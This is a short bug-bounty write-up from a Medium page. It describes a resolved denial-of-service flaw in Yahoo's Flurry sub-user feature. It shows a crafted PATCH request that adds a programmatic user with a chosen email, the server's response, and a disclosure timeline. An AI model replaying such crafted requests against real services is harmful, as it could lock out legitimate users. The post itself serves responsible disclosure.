DOS attack in Yahoo, How i was able to deny new users from service?

Sub-Users feature
  • Invite a sub user with a customized permissions
  • Create a programmatic user with api permissions
PATCH /pulse/v1/ HTTP/2
Host: ecto.flurry.com
[{“op”:”add”,”path”:”user”,”value”:{“type”:”user”,”id”:”5b1b8f87–9d79–4516–8576-f77e4411a46a”,”attributes”:{“email”:”354732_bd6adce9–2118–4fb9-a043–009f49968553@programmatic.flurry.com”,”programmatic”:”true”}}},{“op”:”add”,”path”:”user/5b1b8f87–9d79–4516–8576-f77e4411a46a/memberships”,”value”:{“type”:”membership”,”id”:”f3ca1d13–12d1–4b0c-8faa-fc14ffb499a3",”attributes”:{“role”:”NONE”,”title”:*",”productRoles”:{“Analytics”:”VIEWER”,”AppSpot”:”VIEWER”,”AdAnalytics”:”NONE”,”RawDataDownload”:”DEV”,”GDPRDataSubjectRights”:”NONE”}},”relationships”:{“company”:{“data”:[{“type”:”company”,”id”:”354732"}]},”user”:{“data”:[{“type”:”user”,”id”:”5b1b8f87–9d79–4516–8576-f77e4411a46a”}]}}}}]
HTTP/2 200 OK[{“data”:{“type”:”user”,”id”:”482035",”attributes”:{“email”:”mostafa@gmail.com”,”firstName”:null,”lastName”:null,”programmatic”:true},”relationships”:{“memberships”:{“data”:[{“type”:”membership”,”id”:”547510"}]}}}},{“data”:{“type”:”membership”,”id”:”547510",”attributes”:{“creationDate”:null,”limitAccess”:false,”limitedAccessProjects”:[],”primaryMembership”:false,”productRoles”:{“Analytics”:”VIEWER”,”AppSpot”:”VIEWER”,”AdAnalytics”:”NONE”,”RawDataDownload”:”DEV”,”GDPRDataSubjectRights”:”NONE”},”role”:”NONE”,”title”:”Cairo programmatic 90477"},”relationships”:{“company”:{“data”:{“type”:”company”,”id”:”354732"}},”user”:{“data”:{“type”:”user”,”id”:”482035"}}}}}]
  • December 17,2019 — Bug reported
  • December 21,2019 — Bug triaged
  • January 28,2020 — Bug resolved
  • February 12,2020–Bounty rewarded 1000$

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mostafa Mamdoh

Mostafa Mamdoh

I’m a Penetration Tester, Bug Hunter @ HackerOne